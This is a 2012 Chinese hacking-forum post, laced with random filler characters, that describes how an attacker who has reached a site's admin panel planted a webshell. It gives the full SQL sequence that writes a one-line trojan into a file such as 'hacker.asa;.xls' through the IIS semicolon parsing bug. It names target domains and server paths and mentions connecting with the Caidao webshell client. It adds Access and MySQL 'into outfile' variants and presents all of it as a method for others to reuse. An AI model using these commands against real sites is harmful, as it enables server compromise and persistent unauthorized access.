好不容易进了后台,发现啥上传啊。备份啊多木有。 I1 S" b1 g; a! l) Z J
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的1 p( i. N* |* L( v6 K
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,! b ^, ?0 Q0 a w% |! n" K
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:% ?5 p: q2 M# ~! x5 c+ f
1.create table cmd (a varchar(50))
6 K' p2 \, ^9 Z% M w g+ z/ @) n1 `2.insert into cmd (a) values (‘‘)2 b: q. I8 h# j9 U5 [ \. [
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd! I" o8 X; f& @3 F
(把表cmd的内容导出为物理路径的一个EXCEL文件)
Z9 e P, H7 y0 y4 t, @4.drop table cmd0 h0 J: e0 a; i" J n+ G
利用IIS的BUG成功拿到了WEBSHELL。
. a0 N: `2 }- k8 _2 ` T6 X% q% p J/ `6 z5 M# d+ m1 p1 m: v4 v s
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! u% Y+ n- {( o5 |, a3 s
1 [% g/ f8 f, Z+ l
SQL语句意思解释:
' p. c5 {# j- L; ~* j 第一句% P5 S# l( u" {+ E
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
. c( q5 `! e, u* b1 r( Q4 D
6 b' m# l' ^% E: ?& |1 m 第二句
; \* i* }- M4 M$ `' A; r 在表cmd的a字段插入一句话木马
( U, R0 q$ l1 @& \# t2 B 第三句
) W8 u' n( }! h7 ] j 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件2 _7 F& r# M% [. G5 @. ^. t8 [* o
}+ a* ?2 q- w. y6 I! [ 第四句
" q* v+ [8 p* S9 i( |$ ] 删除建立的cmd表
/ `1 `* j0 c, T& j& `5 z
3 n4 Z3 m- l( V' U. {4 n- ` 以下内容为测试:
- \; d0 A% }* m9 R7 k2 h+ M Access利用后台SQL执行命令功能导出WebShell:
( z# k( B- E7 H. |: N 这个更简单:
% t+ Z" M$ |8 M( W7 `+ C5 F [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
9 p$ Z4 E% t0 F2 o! j2 N 或者
0 b2 A. P1 p6 C/ Q [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
" S& {6 p! G1 W1 r8 m. e& q+ P& s. d. U) @& L) u
后台有执行SQL语句功能(vote为已知表段)- e! @, K7 F. w# ]* j! S: n
希望对大家有所帮助拿shell的又一个思路4 v" c. f) p( {- w
|
发表于 2012-9-13 17:53:58
收藏
支持
反对